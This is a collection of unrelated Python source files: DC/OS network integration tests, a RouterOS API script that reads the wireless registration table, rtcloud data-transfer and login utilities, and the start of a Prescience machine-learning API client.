log.info("Deploying port mapping app: {}".format(pm_app))
pm_app.wait(dcos_api_session)
log.info('Apps are ready')
return tests
def vip_workload_test(dcos_api_session, container, vip_net, proxy_net, ipv6,
named_vip, same_host, with_port_mapping_app):
slaves = dcos_api_session.slaves + dcos_api_session.public_slaves
vip_port = unused_port()
origin_host = slaves[0]
proxy_host = slaves[0] if same_host else slaves[1]
if named_vip:
label = str(uuid.uuid4())
vip = '/{}:{}'.format(label, vip_port)
vipaddr = '{}.marathon.l4lb.thisdcos.directory:{}'.format(label, vip_port)
elif ipv6:
vip_ip = 'fd01:c::{}'.format(unused_octet())
vip = '{}:{}'.format(vip_ip, vip_port)
vipaddr = '[{}]:{}'.format(vip_ip, vip_port)
else:
vip = '198.51.100.{}:{}'.format(unused_octet(), vip_port)
vipaddr = vip
cmd = '{} {} http://{}/test_uuid'.format(
'/opt/mesosphere/bin/curl -s -f -m 5',
'--ipv6' if ipv6 else '--ipv4',
vipaddr)
path_id = '/integration-tests/{}-{}-{}'.format(
enum2str(container),
net2str(vip_net, ipv6),
net2str(proxy_net, ipv6))
test_case_id = '{}-{}'.format(
'named' if named_vip else 'vip',
'local' if same_host else 'remote')
# NOTE: DNS label can't be longer than 63 bytes
origin_fmt = '{}/app-{}'.format(path_id, test_case_id)
origin_fmt = origin_fmt + '-{{:.{}}}'.format(63 - len(origin_fmt))
proxy_fmt = '{}/proxy-{}'.format(path_id, test_case_id)
proxy_fmt = proxy_fmt + '-{{:.{}}}'.format(63 - len(proxy_fmt))
network_name = 'dcos6' if ipv6 else 'dcos' # it is used for user network mode only
if container == Container.POD:
origin_app = MarathonPod(vip_net, origin_host, vip, pod_name_fmt=origin_fmt)
proxy_app = MarathonPod(proxy_net, proxy_host, pod_name_fmt=proxy_fmt)
else:
origin_app = MarathonApp(container, vip_net, origin_host, vip,
network_name=network_name, app_name_fmt=origin_fmt)
proxy_app = MarathonApp(container, proxy_net, proxy_host,
network_name=network_name, app_name_fmt=proxy_fmt)
# Port mappiong application runs on `proxy_host` and has the `host_port` same as `vip_port`.
pm_fmt = '{}/pm-{}'.format(path_id, test_case_id)
pm_fmt = pm_fmt + '-{{:.{}}}'.format(63 - len(pm_fmt))
if with_port_mapping_app:
pm_container = Container.MESOS if container == Container.POD else container
pm_app = MarathonApp(pm_container, marathon.Network.BRIDGE, proxy_host, host_port=vip_port, app_name_fmt=pm_fmt)
else:
pm_app = None
hosts = list(set([origin_host, proxy_host]))
return (vip, hosts, cmd, origin_app, proxy_app, pm_app)
@retrying.retry(wait_fixed=2000,
stop_max_delay=120 * 1000,
retry_on_exception=lambda x: True)
def test_if_overlay_ok(dcos_api_session):
def _check_overlay(hostname, port):
overlays = dcos_api_session.get('/overlay-agent/overlay', host=hostname, port=port).json()['overlays']
assert len(overlays) > 0
for overlay in overlays:
assert overlay['state']['status'] == 'STATUS_OK'
for master in dcos_api_session.masters:
_check_overlay(master, 5050)
for slave in dcos_api_session.all_slaves:
_check_overlay(slave, 5051)
def test_if_dcos_l4lb_disabled(dcos_api_session):
'''Test to make sure dcos_l4lb is disabled'''
if lb_enabled():
pytest.skip('Load Balancer enabled')
data = subprocess.check_output(['/usr/bin/env', 'ip', 'rule'])
# dcos-net creates this ip rule: `9999: from 9.0.0.0/8 lookup 42`
# We check it doesn't exist
assert str(data).find('9999') == -1
def test_ip_per_container(dcos_api_session):
'''Test if we are able to connect to a task with ip-per-container mode
'''
# Launch the test_server in ip-per-container mode (user network)
if len(dcos_api_session.slaves) < 2:
pytest.skip("IP Per Container tests require 2 private agents to work")
app_definition, test_uuid = test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
container_type=marathon.Container.DOCKER,
network=marathon.Network.USER,
host_port=9080)
app_definition['instances'] = 2
app_definition['constraints'] = [['hostname', 'UNIQUE']]
with dcos_api_session.marathon.deploy_and_cleanup(app_definition, check_health=True):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
app_port = app_definition['container']['portMappings'][0]['containerPort']
cmd = '/opt/mesosphere/bin/curl -s -f -m 5 http://{}:{}/ping'.format(service_points[1].ip, app_port)
ensure_routable(cmd, service_points[0].host, service_points[0].port)
@pytest.mark.parametrize('networking_mode', list(marathon.Network))
@pytest.mark.parametrize('host_port', [9999, 0])
def test_app_networking_mode_with_defined_container_port(dcos_api_session, networking_mode, host_port):
"""
The Admin Router can proxy a request on the `/service/[app]`
endpoint to an application running in a container in different networking
modes with manually or automatically assigned host port on which is
the application HTTP endpoint exposed.
Networking modes are testing following configurations:
- host
- container
- container/bridge
https://mesosphere.github.io/marathon/docs/networking.html#networking-modes
"""
app_definition, test_uuid = test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
container_type=marathon.Container.DOCKER,
network=networking_mode,
host_port=host_port)
dcos_service_name = uuid.uuid4().hex
app_definition['labels'] = {
'DCOS_SERVICE_NAME': dcos_service_name,
'DCOS_SERVICE_PORT_INDEX': '0',
'DCOS_SERVICE_SCHEME': 'http',
}
# Arbitrary buffer time, accounting for propagation/processing delay.
buffer_time = 5
# Cache refresh in Adminrouter takes 30 seconds at most.
# CACHE_POLL_PERIOD=25s + valid=5s Nginx resolver DNS entry TTL
# https://github.com/dcos/dcos/blob/cb9105ee537cc44cbe63cc7c53b3b01b764703a0/
# packages/adminrouter/extra/src/includes/http/master.conf#L21
adminrouter_default_refresh = 25 + 5 + buffer_time
app_id = app_definition['id']
app_instances = app_definition['instances']
app_definition['constraints'] = [['hostname', 'UNIQUE']]
# For the routing check to work, two conditions must be true:
#
# 1. The application must be deployed, so that `/ping` responds with 200.
# 2. The Admin Router routing layer must not be using an outdated
# version of the Nginx resolver cache.
#
# We therefore wait until these conditions have certainly been met.
# We wait for the Admin Router cache refresh first so that there is
# unlikely to be much double-waiting. That is, we do not want to be waiting
# for the cache to refresh when it already refreshed while we were waiting
# for the app to become healthy.
with dcos_api_session.marathon.deploy_and_cleanup(app_definition, check_health=False):
time.sleep(adminrouter_default_refresh)
dcos_api_session.marathon.wait_for_app_deployment(
app_id=app_id,
app_instances=app_instances,
check_health=False,
ignore_failed_tasks=False,
timeout=1200,
)
r = dcos_api_session.get('/service/' + dcos_service_name + '/ping')
assert r.status_code == 200
assert 'pong' in r.json()
@retrying.retry(wait_fixed=2000,
stop_max_delay=100 * 2000,
retry_on_exception=lambda x: True)
def geturl(url):
rs = requests.get(url)
assert rs.status_code == 200
r = rs.json()
log.info('geturl {} -> {}'.format(url, r))
return r
def test_l4lb(dcos_api_session):
'''Test l4lb is load balancing between all the backends
* create 5 apps using the same VIP
* get uuid from the VIP in parallel from many threads
* verify that 5 uuids have been returned
* only testing if all 5 are hit at least once
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
numapps = 5
numthreads = numapps * 4
apps = []
rvs = deque()
backends = []
dnsname = 'l4lbtest.marathon.l4lb.thisdcos.directory:5000'
with contextlib.ExitStack() as stack:
for _ in range(numapps):
origin_app, origin_uuid = \
test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP)
# same vip for all the apps
origin_app['portDefinitions'][0]['labels'] = {'VIP_0': '/l4lbtest:5000'}
apps.append(origin_app)
stack.enter_context(dcos_api_session.marathon.deploy_and_cleanup(origin_app))
sp = dcos_api_session.marathon.get_app_service_endpoints(origin_app['id'])
backends.append({'port': sp[0].port, 'ip': sp[0].host})
# make sure that the service point responds
geturl('http://{}:{}/ping'.format(sp[0].host, sp[0].port))
# make sure that the VIP is responding too
geturl('http://{}/ping'.format(dnsname))
vips = geturl("http://localhost:62080/v1/vips")
[vip] = [vip for vip in vips if vip['vip'] == dnsname and vip['protocol'] == 'tcp']
for backend in vip['backend']:
backends.remove(backend)
assert backends == []
# do many requests in parallel.
def thread_request():
# deque is thread safe
rvs.append(geturl('http://l4lbtest.marathon.l4lb.thisdcos.directory:5000/test_uuid'))
threads = [threading.Thread(target=thread_request) for i in range(0, numthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
expected_uuids = [a['id'].split('-')[2] for a in apps]
received_uuids = [r['test_uuid'] for r in rvs if r is not None]
assert len(set(expected_uuids)) == numapps
assert len(set(received_uuids)) == numapps
assert set(expected_uuids) == set(received_uuids)
def test_dcos_cni_l4lb(dcos_api_session):
'''
This tests the `dcos - l4lb` CNI plugins:
https: // github.com / dcos / dcos - cni / tree / master / cmd / l4lb
The `dcos-l4lb` CNI plugins allows containers running on networks that don't
necessarily have routes to spartan interfaces and minuteman VIPs to consume DNS
service from spartan and layer-4 load-balancing services from minuteman by
injecting spartan and minuteman services into the container's network
namespace. You can read more about the motivation for this CNI plugin and type
of problems it solves in this design doc:
https://docs.google.com/document/d/1xxvkFknC56hF-EcDmZ9tzKsGiZdGKBUPfrPKYs85j1k/edit?usp=sharing
In order to test `dcos-l4lb` CNI plugin we emulate a virtual network that
lacks routes for spartan interface and minuteman VIPs. In this test, we
first install a virtual network called `spartan-net` on one of the agents.
The `spartan-net` is a CNI network that is a simple BRIDGE network with the
caveat that it doesn't have any default routes. `spartan-net` has routes
only for the agent network. In other words it doesn't have any routes
towards the spartan-interfaces or minuteman VIPs.
We then run a server (our python ping-pong server) on the DC/OS overlay.
Finally to test that the `dcos-l4lb` plugin, which is also part of
`spartan-net` is able to inject the Minuteman and Spartan services into the
contianer's netns, we start a client on the `spartan-net` and try to `curl` the
`ping-pong` server using its VIP. Without the Minuteman and Spartan services
injected in the container's netns the expectation would be that this `curl`
would fail, with a successful `curl` execution on the VIP allowing the
test-case to PASS.
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
expanded_config = test_helpers.get_expanded_config()
if expanded_config.get('security') == 'strict':
pytest.skip('Cannot setup CNI config with EE strict mode enabled')
# Run all the test application on the first agent node
host = dcos_api_session.slaves[0]
# CNI configuration of `spartan-net`.
spartan_net = {
'cniVersion': '0.2.0',
'name': 'spartan-net',
'type': 'dcos-l4lb',
'delegate': {
'type': 'mesos-cni-port-mapper',
'excludeDevices': ['sprt-cni0'],
'chain': 'spartan-net',
'delegate': {
'type': 'bridge',
'bridge': 'sprt-cni0',
'ipMasq': True,
'isGateway': True,
'ipam': {
'type': 'host-local',
'subnet': '192.168.250.0/24',
'routes': [
# Reachability to DC/OS overlay.
{'dst': '9.0.0.0/8'},
# Reachability to all private address subnet. We need
# this reachability since different cloud providers use
# different private address spaces to launch tenant
# networks.
{'dst': '10.0.0.0/8'},
{'dst': '172.16.0.0/12'},
{'dst': '192.168.0.0/16'}
]
}
}
}
}
log.info("spartan-net config:{}".format(json.dumps(spartan_net)))
# Application to deploy CNI configuration.
cni_config_app = MarathonApp(
marathon.Container.NONE, marathon.Network.HOST, host,
app_name_fmt='/integration-test/cni-l4lb/config-{}')
# Override the default test app command with a command to write the CNI
# configuration.
#
# NOTE: We add the original command at the end of this command so that the task
# stays alive for the test harness to make sure that the task got deployed.
# Ideally we should be able to deploy one of tasks using the test harness
# but that doesn't seem to be the case here.
cni_config_app.app['cmd'] = \
"echo '{}' > {} && {}".format(
json.dumps(spartan_net),
'/opt/mesosphere/etc/dcos/network/cni/spartan.cni',
cni_config_app.app['cmd'])
log.info("CNI Config application: {}".format(cni_config_app.app))
try:
cni_config_app.deploy(dcos_api_session)
cni_config_app.wait(dcos_api_session)
finally:
cni_config_app.purge(dcos_api_session)
log.info("CNI Config has been deployed on {}".format(host))
# Get the host on which the `spartan-net` was installed.
# Launch the test-app on DC/OS overlay, with a VIP.
server_vip_label = '/spartanvip:10000'
server_vip_addr = 'spartanvip.marathon.l4lb.thisdcos.directory:10000'
# Launch the test_server in ip-per-container mode (user network)
server_app = MarathonApp(
marathon.Container.MESOS, marathon.Network.USER, host,
vip=server_vip_label, app_name_fmt='/integration-test/cni-l4lb/server-{}')
log.info("Server application: {}".format(server_app.app))
# Get the client app on the 'spartan-net' network.
client_app = MarathonApp(
marathon.Container.MESOS, marathon.Network.USER, host,
network_name='spartan-net', app_name_fmt='/integration-test/cni-l4lb/client-{}')
log.info("Client application: {}".format(client_app.app))
try:
# Launch the test application
client_app.deploy(dcos_api_session)
server_app.deploy(dcos_api_session)
# Wait for the test application
server_app.wait(dcos_api_session)
client_app.wait(dcos_api_session)
client_host, client_port = client_app.hostport(dcos_api_session)
# Check linux kernel version
uname = ensure_routable('uname -r', client_host, client_port, json_output=False)
if '3.10.0-862' <= uname < '3.10.0-898':
return pytest.skip('See https://bugzilla.redhat.com/show_bug.cgi?id=1572983')
# Change the client command task to do a curl on the server we just deployed.
cmd = '/opt/mesosphere/bin/curl -s -f -m 5 http://{}/test_uuid'.format(server_vip_addr)
assert ensure_routable(cmd, client_host, client_port)['test_uuid'] == server_app.uuid
finally:
server_app.purge(dcos_api_session)
client_app.purge(dcos_api_session)
def enum2str(value):
return str(value).split('.')[-1].lower()
def net2str(value, ipv6):
return enum2str(value) if not ipv6 else 'ipv6'
@retrying.retry(wait_fixed=2000,
stop_max_delay=100 * 2000,
retry_on_exception=lambda x: True)
def test_dcos_net_cluster_identity(dcos_api_session):
cluster_id = 'minuteman' # default
expanded_config = test_helpers.get_expanded_config()
if expanded_config['dcos_net_cluster_identity'] == 'true':
with open('/var/lib/dcos/cluster-id') as f:
cluster_id = "'{}'".format(f.readline().rstrip())
argv = ['sudo', '/opt/mesosphere/bin/dcos-net-env', 'eval', 'erlang:get_cookie().']
cookie = subprocess.check_output(argv, stderr=subprocess.STDOUT).decode('utf-8').rstrip()
assert cluster_id == cookie, "cluster_id: {}, cookie: {}".format(cluster_id, cookie)
|
scriptHotSpot.py
|
#!/usr/bin/python3
import sys, posix, time, binascii, socket, select, multiprocessing
import hashlib, time
class ApiRos:
"Routeros api"
def __init__(self, sk):
self.sk = sk
self.currenttag = 0
def login(self, username, pwd):
for repl, attrs in self.talk(["/login"]):
chal = binascii.unhexlify((attrs['=ret']).encode('UTF-8'))
md = hashlib.md5()
md.update(b'\x00')
md.update(pwd.encode('UTF-8'))
md.update(chal)
self.talk(["/login", "=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8') ])
def talk(self, words):
if self.writeSentence(words) == 0: return
r = []
while 1:
i = self.readSentence();
if len(i) == 0: continue
reply = i[0]
attrs = {}
for w in i[1:]:
j = w.find('=', 1)
if (j == -1):
attrs[w] = ''
else:
attrs[w[:j]] = w[j+1:]
r.append((reply, attrs))
if reply == '!done': return r
def writeSentence(self, words):
ret = 0
for w in words:
self.writeWord(w)
ret += 1
self.writeWord('')
return ret
def readSentence(self):
r = []
while 1:
w = self.readWord()
if w == '': return r
r.append(w)
def writeWord(self, w):
print(("<<< " + w))
self.writeLen(len(w))
self.writeStr(w)
def readWord(self):
ret = self.readStr(self.readLen())
print((">>> " + ret))
return ret
def writeLen(self, l):
if l < 0x80:
self.writeStr(chr(l))
elif l < 0x4000:
l |= 0x8000
self.writeStr(chr((l >> 8) & 0xFF))
self.writeStr(chr(l & 0xFF))
elif l < 0x200000:
l |= 0xC00000
self.writeStr(chr((l >> 16) & 0xFF))
self.writeStr(chr((l >> 8) & 0xFF))
self.writeStr(chr(l & 0xFF))
elif l < 0x10000000:
l |= 0xE0000000
self.writeStr(chr((l >> 24) & 0xFF))
self.writeStr(chr((l >> 16) & 0xFF))
self.writeStr(chr((l >> 8) & 0xFF))
self.writeStr(chr(l & 0xFF))
else:
self.writeStr(chr(0xF0))
self.writeStr(chr((l >> 24) & 0xFF))
self.writeStr(chr((l >> 16) & 0xFF))
self.writeStr(chr((l >> 8) & 0xFF))
self.writeStr(chr(l & 0xFF))
def readLen(self):
c = ord(self.readStr(1))
if (c & 0x80) == 0x00:
pass
elif (c & 0xC0) == 0x80:
c &= ~0xC0
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xE0) == 0xC0:
c &= ~0xE0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF0) == 0xE0:
c &= ~0xF0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF8) == 0xF0:
c = ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
return c
def writeStr(self, str):
n = 0;
while n < len(str):
r = self.sk.send(bytes(str[n:], 'UTF-8'))
if r == 0: raise RuntimeError("connection closed by remote end")
n += r
def readStr(self, length):
ret = ''
while len(ret) < length:
s = self.sk.recv(length - len(ret))
if s == '': raise RuntimeError("connection closed by remote end")
ret += s.decode('UTF-8', 'replace')
return ret
def main():
s = None
for res in socket.getaddrinfo(sys.argv[1], "8728", socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except (socket.error, msg):
s = None
continue
try:
s.connect(sa)
except (socket.error, msg):
s.close()
s = None
continue
break
if s is None:
print ('could not open socket')
sys.exit(1)
apiros = ApiRos(s);
apiros.login('admin', 'PASSWORD');
inputsentence = ['/interface/wireless/registration-table/print']
apiros.writeSentence(inputsentence)
t_end = time.time() + 2.5
while time.time() < t_end:
r = select.select([s], [], [], None)
if s in r[0]:
# something to read in socket, read sentence
x = apiros.readSentence()
sys.exit()
if __name__ == '__main__':
p=multiprocessing.Process(target=main, name="Main")
p.start()
p.join(2)
if p.is_alive():
print("Killing...")
p.terminate()
p.join()
|
projectUtils.py
|
"""
This module contains utility functions used internally by the rtcloud services
"""
import os
import sys
import re
import time
import zlib
import hashlib
import logging
import getpass
import requests
import threading
from pathlib import Path
from base64 import b64encode, b64decode
import rtCommon.utils as utils
from rtCommon.structDict import StructDict
from rtCommon.imageHandling import readDicomFromBuffer
from rtCommon.errors import RequestError, StateError, ValidationError
from requests.packages.urllib3.contrib import pyopenssl
certFile = 'certs/rtcloud.crt'
# Cache of multi-part data transfers in progress
multiPartDataCache = {}
dataPartSize = 10 * (2**20)
def watchForExit():
'''
Create a thread which will detect if the parent process exited by
reading from stdin, when stdin is closed exit this process.
'''
exitThread = threading.Thread(name='exitThread', target=processShouldExitThread)
exitThread.setDaemon(True)
exitThread.start()
def processShouldExitThread():
'''
If this client was spawned by a parent process, then by listening on
stdin we can tell that the parent process exited when stdin is closed. When
stdin is closed we can exit this process as well.
'''
# print('processShouldExitThread: starting', flush=True)
while True:
# logging.info('process should exit loop')
data = sys.stdin.read()
if len(data) == 0:
print('processShouldExitThread: stdin closed, exiting', flush=True)
os._exit(0) # - this kills everything immediately
break
time.sleep(0.5)
def generateDataParts(data, msg, compress):
"""
A python "generator" that, for data > 10 MB, will create multi-part
messages of 10MB each to send the data incrementally
Args:
data (bytes): data to send
msg (dict): message header for the request
compress (bool): whether to compress the data befor sending
Returns:
Repeated calls return the next partial message to be sent until
None is returned
"""
dataSize = len(data)
# update message for all data parts with the following info
numParts = (dataSize + dataPartSize - 1) // dataPartSize
msg['status'] = 200
msg['fileSize'] = dataSize
msg['fileHash'] = hashlib.md5(data).hexdigest()
msg['numParts'] = numParts
if numParts > 1:
msg['multipart'] = True
i = 0
partId = 0
dataSize = len(data)
while i < dataSize:
msgPart = msg.copy()
partId += 1
sendSize = dataSize - i
if sendSize > dataPartSize:
sendSize = dataPartSize
dataPart = data[i:i+sendSize]
msgPart['partId'] = partId
try:
msgPart = encodeMessageData(msgPart, dataPart, compress)
except Exception as err:
msgPart['status'] = 400
msgPart['error'] = str(err)
yield msgPart
break
yield msgPart
i += sendSize
return
def encodeMessageData(message, data, compress):
"""
b64 encode binary data in preparation for sending. Updates the message header
as needed
Args:
message (dict): message header
data (bytes): binary data
compress (bool): whether to compress binary data
Returns:
Modified message dict with appropriate fields filled in
"""
message['hash'] = hashlib.md5(data).hexdigest()
dataSize = len(data)
if compress or dataSize > (20*2**20):
message['compressed'] = True
data = zlib.compress(data)
message['data'] = b64encode(data).decode('utf-8')
message['dataSize'] = dataSize
# if 'compressed' in message:
# print('Compression ratio: {:.2f}'.format(len(message['data'])/dataSize))
if len(message['data']) > 100*1024*1024:
message['data'] = None
raise ValidationError('encodeMessageData: encoded file exceeds max size of 100MB')
return message
def decodeMessageData(message):
"""
Given a message encoded with encodeMessageData (above), decode that message.
Validate and retrive orignal bytes.
Args:
message (dict): encoded message to decode
Returns:
The byte data of the original message from the sender
"""
data = None
if 'data' not in message:
raise RequestError('decodeMessageData: data field not in response')
decodedData = b64decode(message['data'])
if 'compressed' in message:
data = zlib.decompress(decodedData)
else:
data = decodedData
if 'hash' in message:
dataHash = hashlib.md5(data).hexdigest()
if dataHash != message['hash']:
raise RequestError('decodeMessageData: Hash checksum mismatch {} {}'.
format(dataHash, message['hash']))
return data
def unpackDataMessage(msg):
"""
Handles receiving multipart (an singlepart) data messages and returns the data bytes.
In the case of multipart messages a data cache is used to store intermediate parts
until all parts are received and the final data can be reconstructed.
Args:
msg (dict): Potentially on part of a multipart message to unpack
Returns:
None if not all multipart messages have been received yet, or
Data bytes if all multipart messages have been received.
"""
global multiPartDataCache
try:
if msg.get('status') != 200:
# On error delete any partial transfers
fileHash = msg.get('fileHash')
if fileHash is not None and fileHash in multiPartDataCache:
del multiPartDataCache[fileHash]
raise RequestError('unpackDataMessage: {} {}'.format(msg.get('status'), msg.get('error')))
data = decodeMessageData(msg)
multipart = msg.get('multipart', False)
numParts = msg.get('numParts', 1)
partId = msg.get('partId', 1)
logging.debug('unpackDataMessage: callid {}, part {} of {}'.format(msg.get('callId'), partId, numParts))
if multipart is False or numParts == 1:
# All data sent in a single message
return data
else:
assert numParts > 1
assert multipart is True
if partId > numParts:
raise RequestError(
'unpackDataMessage: Inconsistent parts: partId {} exceeds numParts {}'.
format(partId, numParts))
# get the data structure for this data
fileHash = msg.get('fileHash')
if partId > 1:
partialDataStruct = multiPartDataCache.get(fileHash)
if partialDataStruct is None:
raise RequestError('unpackDataMessage: partialDataStruct not found')
else:
partialDataStruct = StructDict({'cachedDataParts': [None]*numParts, 'numCachedParts': 0})
multiPartDataCache[fileHash] = partialDataStruct
partialDataStruct.cachedDataParts[partId-1] = data
partialDataStruct.numCachedParts += 1
if partialDataStruct.numCachedParts == numParts:
# All parts of the multipart transfer have been received
# Concatenate the data into one bytearray
data = bytearray()
for i in range(numParts):
dataPart = partialDataStruct.cachedDataParts[i]
if dataPart is None:
raise StateError('unpackDataMessage: missing dataPart {}'.format(i))
data.extend(dataPart)
# Check fileHash and fileSize
dataHash = hashlib.md5(data).hexdigest()
dataSize = len(data)
if dataHash != fileHash:
raise RequestError("unpackDataMessage: File checksum mismatch {} {}".
format(dataHash, fileHash))
if dataSize != msg.get('fileSize', 0):
raise RequestError("unpackDataMessage: File size mismatch {} {}".
format(dataSize, msg.get('fileSize', 0)))
# delete the multipart data cache for this item
del multiPartDataCache[fileHash]
return data
# Multi-part transfer not complete, nothing to return
return None
except Exception as err:
# removed any cached data
fileHash = msg.get('fileHash')
if fileHash and fileHash in multiPartDataCache:
del multiPartDataCache[fileHash]
raise err
def formatFileData(filename, data):
"""
Convert raw bytes to a specific memory format such as dicom or matlab data
"""
fileExtension = Path(filename).suffix
if fileExtension == '.mat':
# Matlab file format
result = utils.loadMatFileFromBuffer(data)
elif fileExtension == '.dcm':
# Dicom file format
result = readDicomFromBuffer(data)
else:
result = data
return result
def login(serverAddr, username, password, testMode=False):
"""
Logs in to a web service, prompting user for username/password as needed,
and returns a session_cookie to allow future requests without logging in.
"""
loginURL = os.path.join('https://', serverAddr, 'login')
if testMode:
loginURL = os.path.join('http://', serverAddr, 'login')
username = 'test'
password = 'test'
session = requests.Session()
session.verify = certFile
try:
getResp = session.get(loginURL, timeout=10)
except Exception:
raise ConnectionError('Connection error: {}'.format(loginURL))
if getResp.status_code != 200:
raise requests.HTTPError('Get URL: {}, returned {}'.format(loginURL, getResp.status_code))
if username is None:
print('Login required...')
username = input('Username: ')
password = getpass.getpass()
elif password is None:
password = getpass.getpass()
postData = {'name': username, 'password': password, '_xsrf': session.cookies['_xsrf']}
postResp = session.post(loginURL, postData)
if postResp.status_code != 200:
raise requests.HTTPError('Post URL: {}, returned {}'.format(loginURL, postResp.status_code))
login_cookie = session.cookies.get('login')
return login_cookie
def checkSSLCertAltName(certFilename, altName):
"""
Check if altName is list as an alternate server name in the ssl certificate
"""
with open(certFilename, 'r') as fh:
certData = fh.read()
x509 = pyopenssl.OpenSSL.crypto.load_certificate(pyopenssl.OpenSSL.crypto.FILETYPE_PEM, certData)
altNames = pyopenssl.get_subj_alt_name(x509)
for _, name in altNames:
if altName == name:
return True
return False
def makeSSLCertFile(serverName):
logging.info('create sslCert')
cmd = 'bash scripts/make-sslcert.sh '
if re.match('^[0-9*]+\.', serverName):
cmd += ' -ip ' + serverName
else:
cmd += ' -url ' + serverName
success = utils.runCmdCheckOutput(cmd.split(), 'certified until')
if not success:
print('Failed to make certificate:')
sys.exit()
|
prescience_client.py
|
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
# Copyright 2019 The Prescience-Client Authors. All rights reserved.
import json
import os
from multiprocessing import Process, Queue
import pycurl
import re
import shutil
import time
import urllib.parse
import io
from io import BytesIO
from datetime import datetime
import matplotlib
import numpy
import pandas
from prescience_client.enum.separator import Separator
from progress.bar import ChargingBar, IncrementalBar
from websocket import create_connection, WebSocketException
from hashids import Hashids
from prescience_client.bean.config import Config
from prescience_client.bean.entity.w10_ts_input import Warp10TimeSerieInput, Warp10Scheduler
from prescience_client.bean.project import Project
from prescience_client.config.constants import DEFAULT_LABEL_NAME, DEFAULT_PROBLEM_TYPE
from prescience_client.config.prescience_config import PrescienceConfig
from prescience_client.enum.algorithm_configuration_category import AlgorithmConfigurationCategory
from prescience_client.enum.flow_type import FlowType
from prescience_client.enum.fold_strategy import FoldStrategy
from prescience_client.enum.input_type import InputType
from prescience_client.enum.problem_type import ProblemType
from prescience_client.enum.scoring_metric import ScoringMetric
from prescience_client.enum.sort_direction import SortDirection
from prescience_client.enum.status import Status
from prescience_client.enum.web_service import PrescienceWebService
from prescience_client.exception.prescience_client_exception import PyCurlExceptionFactory, \
HttpErrorExceptionFactory, PrescienceClientException, PrescienceException
from prescience_client.utils import dataframe_to_dict_series
from prescience_client.utils.monad import Option
class PrescienceClient(object):
"""
Prescience HTTP client allowing us to interact directly with prescience api.
Prescience API is describe here https://prescience-api.ai.ovh.net/
"""
def __init__(self,
prescience_config: PrescienceConfig):
self.prescience_config = prescience_config
self.hashids = Hashids()
def _get_unique_id(self):
return self.hashids.encrypt(int(time.time()))
def login(self):
"""
Method used for login into prescience
:return: The cookie token used to connect to the web-socket
"""
_, _, cookie = self.__get(path='/session/login')
return cookie['token']
def config(self) -> PrescienceConfig:
"""
Getter of the prescience configuration object
:return: The prescience configuration object
"""
return self.prescience_config
def new_project_token(self) -> dict:
"""
ADMIN ONLY METHOD
This method needs admin right to be authorized on prescience server
It allow you to create a new prescience project and give you back the bearer token for this project
:return:
"""
current_config = self.config()
_, result, _ = self.__post(
path='/project',
call_type=PrescienceWebService.ADMIN_API,
data={'name': current_config.get_current_project_name()}
)
return result
def upload_source(self,
source_id: str,
input_type: InputType,
headers: bool,
separator: Separator,
filepath: str
) -> 'Task':
"""
Upload a local input file on prescience and launch a Parse Task on it for creating a source.
:param source_id: The id that we want for the source
:param input_type: The input type of the given local input file
:param separator: The CSV Separator
:param headers: Has the local input file headers ?
:param filepath: The path of the local input file/directory
:return: The task object of the Parse Task
"""
parse_input = {
'source_id': source_id,
'type': str(input_type),
'headers': headers,
'separator': str(separator)
}
print("Uploading source with following arguments :")
print(json.dumps(parse_input, indent=4))
if os.path.isdir(filepath):
multipart = [
(
'input-file',
(pycurl.FORM_FILE, os.path.join(filepath, filename))
) for filename in os.listdir(filepath)
]
else:
multipart = [
('input-file', (pycurl.FORM_FILE, filepath))
]
multipart = [
('input',
(pycurl.FORM_CONTENTS, json.dumps(parse_input), pycurl.FORM_CONTENTTYPE, 'application/json'))
] + multipart
_, result, _ = self.__post(path='/ml/upload/source', multipart=multipart)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def parse_w10_time_serie(self, w10_ts_input: Warp10TimeSerieInput) -> 'Task':
"""
Launch a parse task on a w10 time series
:param w10_ts_input: Input Payload containing all w10 TS information
:return: The created parse task
"""
_, result, _ = self.__post(path='/ml/parse/ts', data=w10_ts_input.to_dict())
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def update_source(self, source_id: str, last_point_date: datetime = None, sample_span: str = None):
"""
Refresh Warp10 source
:param source_id: The source_id
last_point_timestamp: The date of the last point to be considered in updating the time serie source. (in us) If not provided it is inferred to now.
sample_span: The size of the sample to be used in updating the time serie source. If not provided it is inferred to the existing sample span.
"""
body = {}
if last_point_date:
body['last_point_timestamp'] = int(last_point_date.timestamp() * 1e6)
if sample_span:
body['sample_span'] = sample_span
_, result, _ = self.__post(path=f'/ml/update/{source_id}', data=body)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def delete_source(self, source_id: str):
"""
Delete a source from its ID
:param source_id: The source ID
"""
self.__delete(path=f'/source/{source_id}')
def delete_dataset(self, dataset_id: str):
"""
Delete a dataset from its ID
:param dataset_id: The dataset ID
"""
self.__delete(path=f'/dataset/{dataset_id}')
def delete_model(self, model_id: str):
"""
Delete a model from its ID
:param model_id: The model ID
"""
self.__delete(path=f'/model/{model_id}')
def preprocess(
self,
source_id: str,
dataset_id: str,
label_id: str = DEFAULT_LABEL_NAME,
problem_type: ProblemType = DEFAULT_PROBLEM_TYPE,
log_enabled: bool = False,
selected_column: list = None,
time_column: str = None,
nb_fold: int = None,
fold_size: int = None,
fold_strategy: FoldStrategy = None,
test_ratio: float = None,
formatter: str = None,
